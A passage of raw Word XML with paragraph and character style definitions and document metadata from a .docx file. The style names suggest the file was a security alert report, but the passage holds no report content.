    <w:name w:val="additional-info-percentages"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00601FA2"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="alerts--site-li">
    <w:name w:val="alerts--site-li"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0060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request-method-n-url">
    <w:name w:val="request-method-n-url"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00601F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FA2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01FA2"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="alert-types-intro">
    <w:name w:val="alert-types-intro"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0060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5B6C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3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marm6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D456F-2598-4F38-967D-9E2EA4A8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tomar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>mayank tomar</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-30T16:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-30T16:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>